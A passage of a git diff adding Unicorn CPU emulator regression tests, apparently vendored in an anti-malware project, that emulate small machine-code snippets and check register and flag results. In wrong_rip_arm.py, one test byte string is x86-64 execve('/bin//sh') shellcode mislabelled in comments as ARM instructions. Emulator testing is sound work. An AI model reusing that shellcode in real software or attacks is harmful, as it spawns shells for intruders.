UC_ARM_REG_R2, &r2); + uc_reg_write(uc, UC_ARM_REG_R3, &r3); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + + // tracing one instruction at ADDRESS with customized callback + uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned: %u\n", err); + } + + // now print out some registers + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_ARM_REG_R0, &r0); + uc_reg_read(uc, UC_ARM_REG_R1, &r1); + printf(">>> R0 = 0x%x\n", r0); + printf(">>> R1 = 0x%x\n", r1); + + uc_close(uc); +} + +static void test_thumb(void) +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + + int sp = 0x1234; // R0 register + + printf("Emulate THUMB code\n"); + + // Initialize emulator in ARM mode + err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u (%s)\n", + err, uc_strerror(err)); + return; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); + + // initialize machine registers + uc_reg_write(uc, UC_ARM_REG_SP, &sp); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + + // tracing one instruction at ADDRESS with customized callback + uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. 
+ err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(THUMB_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned: %u\n", err); + } + + // now print out some registers + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_ARM_REG_SP, &sp); + printf(">>> SP = 0x%x\n", sp); + + uc_close(uc); +} + +int main(int argc, char **argv, char **envp) +{ + test_arm(); + printf("==========================\n"); + test_thumb(); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py new file mode 100644 index 0000000..1f8e548 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py @@ -0,0 +1,78 @@ +#!/usr/bin/python +# By Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress, struct + + +class Emulator: + def __init__(self, code, stack): + self.mask = 0xFFFFFFFFFFFFF000 + self.unicorn_code = code + self.unicorn_stack = stack + self.mu = Uc(UC_ARCH_X86, UC_MODE_64) + size = 1 * 4096 + self.mu.mem_map(code & self.mask, size) + size = 1 * 4096 + self.mu.mem_map(stack & self.mask, size) + self.set_hooks() + + def set_hooks(self): + self.mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) + self.mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) + self.mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + next_ip = self.unicorn_code + size + self.mu.reg_write(UC_X86_REG_RIP, next_ip) + self.mu.mem_write(next_ip, "\x90") + self.mu.reg_write(UC_X86_REG_RIP, address) + return True + + def hook_mem_invalid(self, uc, access, address, size, value, user_data): + return True + + def hook_mem_access(self, uc, access, address, size, value, user_data): + return True + + def 
emu(self, size): + ip = self.mu.reg_read(UC_X86_REG_RIP) + try: + self.mu.emu_start(ip, ip + size, timeout=10000, count=1) + except UcError as e: + print("Error %s" % e) + + def write_data(self, address, content): + self.mu.mem_write(address, content) + + +class Init(regress.RegressTest): + def init_unicorn(self, ip, sp, counter): + #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) + E = Emulator(ip, sp) + E.write_data(ip, "\x90") + E.write_data(sp, self.generate_value(counter)) + E.mu.reg_write(UC_X86_REG_RSP, sp) + E.mu.reg_write(UC_X86_REG_RIP, ip) + E.emu(1) + + def generate_value(self, counter): + start = 0xffff880026f02000 + offset = counter * 8 + address = start + offset + return struct.pack(">> Before emulation ") + print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) + print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) + for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): + val = mu.reg_read(i) + print("\t %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) + + self.assertEqual(UC_ARM_REG_D6, mu.reg_read(UC_ARM_REG_D6)) + self.assertEqual(UC_ARM_REG_D7, mu.reg_read(UC_ARM_REG_D7)) + + try: + content = mu.mem_read(SCRATCH_ADDRESS, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) + content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) + except Exception, errtxt: + print (errtxt) + + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + val = mu.reg_read(UC_ARM_REG_PC) + print(">>> PC = 0x%x" %val) + for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): + val = mu.reg_read(i) + print(">>> %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) + + print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) + print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) + + try: + content = mu.mem_read(SCRATCH_ADDRESS, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) + content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) + except Exception, errtxt: + print (errtxt) + + self.assertEqual(mu.reg_read(UC_ARM_REG_D6), 0x0101010101010101) + self.assertEqual(mu.reg_read(UC_ARM_REG_D7), 0x0101010101010101) + + except UcError as e: + print("ERROR: %s" % e) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py new file mode 100644 index 0000000..7bdb1e4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +X86_CODE64 = "\x90" # NOP + + +class WriteBeforeMap(regress.RegressTest): + def runTest(self): + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # memory address where emulation starts + ADDRESS = 0x1000000 + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py new file mode 100644 index 0000000..8754980 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py @@ -0,0 +1,71 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +binary1 = b'\xb8\x02\x00\x00\x00' # mov eax, 2 +binary2 = b'\xb8\x01\x00\x00\x00' # mov eax, 1 + +class WrongRIP(regress.RegressTest): + + def test_step(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1 + binary2) + # emu for maximum 1 instruction. + mu.emu_start(0, 5, 0, 1) + + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) + + mu.emu_start(5, 10, 0, 1) + self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + + def test_step2(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1 + binary2) + # emu for maximum 1 instruction. + mu.emu_start(0, 10, 0, 1) + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) + + mu.emu_start(5, 10, 0, 1) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) + + def test_step3(self): + bin3 = b'\x40\x01\xc1\x31\xf6' # inc eax; add ecx, eax; xor esi, esi + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, bin3) + # emu for maximum 1 instruction. + mu.emu_start(0, 10, 0, 1) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) + + def test_step_then_fin(self): + bin4 = b'\x40\x01\xc1\x31\xf6\x90\x90\x90' # inc eax; add ecx, eax; xor esi, esi + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, bin4) + # emu for maximum 1 instruction. 
+ mu.emu_start(0, len(binary1), 0, 1) + + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) + # emu to the end + mu.emu_start(1, len(bin4)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(len(bin4), mu.reg_read(UC_X86_REG_EIP)) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py new file mode 100644 index 0000000..de710d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py @@ -0,0 +1,38 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * +from unicorn.arm_const import * + +import regress + +# adds r1, #0x48 +# ldrsb r7, [r7, r7] +# ldrsh r7, [r2, r1] +# ldr r0, [pc, #0x168] +# cmp r7, #0xbf +# str r7, [r5, #0x20] +# ldr r1, [r5, #0x64] +# strb r7, [r5, #0xc] +# ldr r0, [pc, #0x1a0] +binary1 = b'\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' +# binary1 = b'\x48\x31\xff\x57' +#adds r1, #0x48 +#ldrsb r7, [r7, r7] + +class WrongRIPArm(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1) + mu.reg_write(UC_ARM_REG_R13, 1 * 1024 * 1024) + # emu for maximum 1 instruction. 
+ mu.emu_start(0, len(binary1), 0, 1) + self.assertEqual(0x48, mu.reg_read(UC_ARM_REG_R1)) + pos = mu.reg_read(UC_ARM_REG_R15) + self.assertEqual(0x2, pos) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py new file mode 100644 index 0000000..13dbd36 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py @@ -0,0 +1,28 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #16 + +from unicorn import * +from unicorn.arm_const import * +from unicorn.arm64_const import * + +import regress + +class WrongSPArm(regress.RegressTest): + + def test_32(self): + with self.assertRaises(UcError): + uc = Uc(UC_ARCH_ARM, UC_MODE_32) + uc.reg_write(UC_ARM_REG_SP, 4) + + def test_64(self): + uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + uc.reg_write(UC_ARM64_REG_SP, 4) + self.assertEqual(0x4, uc.reg_read(UC_ARM64_REG_SP)) + + def test_arm(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.reg_write(UC_ARM_REG_SP, 4) + self.assertEqual(0x4, uc.reg_read(UC_ARM_REG_SP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c new file mode 100644 index 0000000..d7d97b0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c @@ -0,0 +1,22 @@ +#include + +#define BINARY "\x90" +#define MEMORY_SIZE 4 * 1024 +#define STARTING_ADDRESS 100 * 1024 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_16, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, 
STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py new file mode 100644 index 0000000..7a40105 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py @@ -0,0 +1,39 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongConditionalPath(regress.RegressTest): + def test_eflags(self): + # 0: 4d 31 f6 xor r14, r14 + # 3: 45 85 f6 test r14d, r14d + # 6: 75 fe jne 0x6 + # 8: f4 hlt + CODE = 'M1\xf6E\x85\xf6u\xfe\xf4' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) + uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x246) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + + uc.emu_start(0x6000b0 + 6, 0, count=1) + + # Here's the original execution trace for this on qemu-user. 
+ # + # $ SC='xor r14,r14; test r14d, r14d; jne $; hlt' + # $ asm --context amd64 --format elf $SC > example + # $ qemu-x86_64-static -d cpu,in_asm -singlestep ./test \ + # | grep -E 'RFL|^0x' + # 0x00000000006000b0: xor %r14,%r14 + # RIP=00000000006000b0 RFL=00000202 [-------] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b3: test %r14d,%r14d + # RIP=00000000006000b3 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b6: jne 0x6000b6 + # RIP=00000000006000b6 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b8: hlt + # RIP=00000000006000b8 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + self.assertEqual(0x6000b0 + 8, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py new file mode 100644 index 0000000..ca7c48d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongEFLAGS(regress.RegressTest): + def test_eflags(self): + # xor r14,r14 + CODE = 'M1\xf6' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) + uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x200) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + uc.emu_start(0x6000b0, 0, count=1) + + + # Here's the original execution trace for this on actual hardware. + # + # (gdb) x/i $pc + # => 0x6000b0: xor %r14,%r14 + # (gdb) p/x $eflags + # $1 = 0x200 + # (gdb) p $eflags + # $2 = [ IF ] + # (gdb) si + # 0x00000000006000b3 in ?? 
() + # (gdb) p/x $eflags + # $3 = 0x246 + # (gdb) p $eflags + # $4 = [ PF ZF IF ] + + self.assertEqual(0x6000b3, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) + self.assertEqual(0x246, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py new file mode 100644 index 0000000..37853c5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py @@ -0,0 +1,155 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from struct import pack + +import regress + + +CODE_ADDR = 0x40000 +CODE_SIZE = 0x1000 + +SCRATCH_ADDR = 0x80000 +SCRATCH_SIZE = 0x1000 + +SEGMENT_ADDR = 0x5000 +SEGMENT_SIZE = 0x1000 + + +FSMSR = 0xC0000100 +GSMSR = 0xC0000101 + + +def set_msr(uc, msr, value, scratch=SCRATCH_ADDR): + ''' + set the given model-specific register (MSR) to the given value. + this will clobber some memory at the given scratch address, as it emits some code. + ''' + # save clobbered registers + orax = uc.reg_read(UC_X86_REG_RAX) + ordx = uc.reg_read(UC_X86_REG_RDX) + orcx = uc.reg_read(UC_X86_REG_RCX) + orip = uc.reg_read(UC_X86_REG_RIP) + + # x86: wrmsr + buf = '\x0f\x30' + uc.mem_write(scratch, buf) + uc.reg_write(UC_X86_REG_RAX, value & 0xFFFFFFFF) + uc.reg_write(UC_X86_REG_RDX, (value >> 32) & 0xFFFFFFFF) + uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) + uc.emu_start(scratch, scratch+len(buf), count=1) + + # restore clobbered registers + uc.reg_write(UC_X86_REG_RAX, orax) + uc.reg_write(UC_X86_REG_RDX, ordx) + uc.reg_write(UC_X86_REG_RCX, orcx) + uc.reg_write(UC_X86_REG_RIP, orip) + + +def get_msr(uc, msr, scratch=SCRATCH_ADDR): + ''' + fetch the contents of the given model-specific register (MSR). + this will clobber some memory at the given scratch address, as it emits some code. 
+ ''' + # save clobbered registers + orax = uc.reg_read(UC_X86_REG_RAX) + ordx = uc.reg_read(UC_X86_REG_RDX) + orcx = uc.reg_read(UC_X86_REG_RCX) + orip = uc.reg_read(UC_X86_REG_RIP) + + # x86: rdmsr + buf = '\x0f\x32' + uc.mem_write(scratch, buf) + uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) + uc.emu_start(scratch, scratch+len(buf), count=1) + eax = uc.reg_read(UC_X86_REG_EAX) + edx = uc.reg_read(UC_X86_REG_EDX) + + # restore clobbered registers + uc.reg_write(UC_X86_REG_RAX, orax) + uc.reg_write(UC_X86_REG_RDX, ordx) + uc.reg_write(UC_X86_REG_RCX, orcx) + uc.reg_write(UC_X86_REG_RIP, orip) + + return (edx << 32) | (eax & 0xFFFFFFFF) + + +def set_gs(uc, addr): + ''' + set the GS.base hidden descriptor-register field to the given address. + this enables referencing the gs segment on x86-64. + ''' + return set_msr(uc, GSMSR, addr) + + +def get_gs(uc): + ''' + fetch the GS.base hidden descriptor-register field. + ''' + return get_msr(uc, GSMSR) + + +def set_fs(uc, addr): + ''' + set the FS.base hidden descriptor-register field to the given address. + this enables referencing the fs segment on x86-64. + ''' + return set_msr(uc, FSMSR, addr) + + +def get_fs(uc): + ''' + fetch the FS.base hidden descriptor-register field. 
+ ''' + return get_msr(uc, FSMSR) + + +class TestGetSetMSR(regress.RegressTest): + def test_msr(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + set_msr(uc, FSMSR, 0x1000) + self.assertEqual(0x1000, get_msr(uc, FSMSR)) + + set_msr(uc, GSMSR, 0x2000) + self.assertEqual(0x2000, get_msr(uc, GSMSR)) + + def test_gs(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + + uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) + uc.mem_map(CODE_ADDR, CODE_SIZE) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + code = '6548330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr gs:[0x18] + uc.mem_write(CODE_ADDR, code) + uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') + + set_gs(uc, SEGMENT_ADDR) + self.assertEqual(SEGMENT_ADDR, get_gs(uc)) + + uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) + + self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) + + def test_fs(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + + uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) + uc.mem_map(CODE_ADDR, CODE_SIZE) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + code = '6448330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr fs:[0x18] + uc.mem_write(CODE_ADDR, code) + uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') + + set_fs(uc, SEGMENT_ADDR) + self.assertEqual(SEGMENT_ADDR, get_fs(uc)) + + uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) + + self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py new file mode 100644 index 0000000..486f6d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongEFLAGS2(regress.RegressTest): + def test_eflags(self): + # imul eax, ebx + CODE = '\x0f\xaf\xc3' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_32) + uc.reg_write(U.x86_const.UC_X86_REG_EAX, 
16) + uc.reg_write(U.x86_const.UC_X86_REG_EBX, 1) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x292) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + uc.emu_start(0x6000b0, 0, count=1) + + + # Here's the original execution trace for this on actual hardware. + # + # (gdb) x/i $eip + # => 0x804aae5: imul eax,DWORD PTR [ebp-0x8] + # (gdb) p/x $eax + # $2 = 0x10 + # (gdb) x/wx $ebp-8 + # 0xbaaaad4c: 0x00000001 + # (gdb) p/x $eflags + # $3 = 0x292 + # (gdb) si + # 0x0804aae9 in ?? () + # (gdb) p/x $eflags + # $4 = 0x202 + + self.assertEqual(0x202, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py new file mode 100644 index 0000000..036ba33 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from struct import pack + +import regress + +CODE_ADDR = 0x1000000 +CODE = ( + '\xb8\x00\x00\x00\x02' # mov eax, 0x2000000 + '\xdb\x28' # fldt [eax] + '\xd9\xfa' # fsqrt +) + +DATA_ADDR = 0x2000000 +DATA = '\0\0\0\0\0\0\0\0\0\1' + +class FldtFsqrt(regress.RegressTest): + def test_fldt_fsqrt(self): + uc = Uc(UC_ARCH_X86, UC_MODE_32) + + uc.mem_map(CODE_ADDR, 0x1000) + uc.mem_write(CODE_ADDR, CODE) + + uc.mem_map(DATA_ADDR, 0x1000) + uc.mem_write(DATA_ADDR, DATA) + + uc.emu_start(CODE_ADDR, CODE_ADDR + len(CODE), 10000, 10) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py new file mode 100644 index 0000000..5f4234a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from 
struct import pack + +import regress + +F_GRANULARITY = 0x8 +F_PROT_32 = 0x4 +F_LONG = 0x2 +F_AVAILABLE = 0x1 + +A_PRESENT = 0x80 + +A_PRIV_3 = 0x60 +A_PRIV_2 = 0x40 +A_PRIV_1 = 0x20 +A_PRIV_0 = 0x0 + +A_CODE = 0x10 +A_DATA = 0x10 +A_TSS = 0x0 +A_GATE = 0x0 + +A_DATA_WRITABLE = 0x2 +A_CODE_READABLE = 0x2 + +A_DIR_CON_BIT = 0x4 + +S_GDT = 0x0 +S_LDT = 0x4 +S_PRIV_3 = 0x3 +S_PRIV_2 = 0x2 +S_PRIV_1 = 0x1 +S_PRIV_0 = 0x0 + +CODE = '65330d18000000'.decode('hex') # xor ecx, dword ptr gs:[0x18] + +def create_selector(idx, flags): + to_ret = flags + to_ret |= idx << 3 + return to_ret + +def create_gdt_entry(base, limit, access, flags): + + to_ret = limit & 0xffff; + to_ret |= (base & 0xffffff) << 16; + to_ret |= (access & 0xff) << 40; + to_ret |= ((limit >> 16) & 0xf) << 48; + to_ret |= (flags & 0xff) << 52; + to_ret |= ((base >> 24) & 0xff) << 56; + return pack(' +#include + + +#define OK(x) {uc_err __err; if ((__err = x)) { fprintf(stderr, "%s", uc_strerror(__err)); assert(false); } } +static void test_vmovdqu(void) +{ + uc_engine *uc; + + int r_esi = 0x1234; + int r_edi = 0x7890; + + uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; + + /* 128 bit at address esi (0x1234) this should not be read into xmm0 */ + char mem_esi[] = { '\xE7', '\x1D', '\xA7', '\xE8', '\x88', '\xE4', '\x94', '\x40', '\x54', '\x74', '\x24', '\x97', '\x1F', '\x2E', '\xB6', '\x40' }; + + /* 128 bit at address edi (0x7890) this SHOULD be read into xmm0 */ + char mem_edi[] = { '\xAD', '\xFA', '\x5C', '\x6D', '\x45', '\x4A', '\x93', '\x40', '\xD2', '\x00', '\xDE', '\x02', '\x89', '\xE8', '\x94', '\x40' }; + + /* vmovdqu xmm0, [edi] */ + char code[] = { '\xC5', '\xFA', '\x6F', '\x07' }; + + /* initialize memory and run emulation */ + OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); + OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); + + OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); + + // initialize machine registers; + OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); + + 
OK(uc_reg_write(uc, UC_X86_REG_ESI, &r_esi)); + OK(uc_reg_write(uc, UC_X86_REG_EDI, &r_edi)); + OK(uc_mem_write(uc, r_esi, mem_esi, sizeof(mem_esi) / sizeof(mem_esi[0]))); + OK(uc_mem_write(uc, r_edi, mem_edi, sizeof(mem_edi) / sizeof(mem_edi[0]))); + + OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); + + /* Read xmm0 after emulation */ + OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); + + + assert(0x4094e88902de00d2 == r_xmm0[0] && 0x40934a456d5cfaad == r_xmm0[1]); + + OK(uc_close(uc)); +} + + +/* TODO: Add more vex prefixed instructions + Suggestions: vxorpd, vxorps, vandpd, ... */ +int main(int argc, char **argv, char **envp) +{ + test_vmovdqu(); + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore b/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore new file mode 100644 index 0000000..d40da5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore @@ -0,0 +1,3 @@ +!*.c +test_* +*.bin diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile new file mode 100644 index 0000000..c0704d3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile @@ -0,0 +1,65 @@ +CFLAGS += -Wall -Werror -Wno-unused-function -g +CFLAGS += 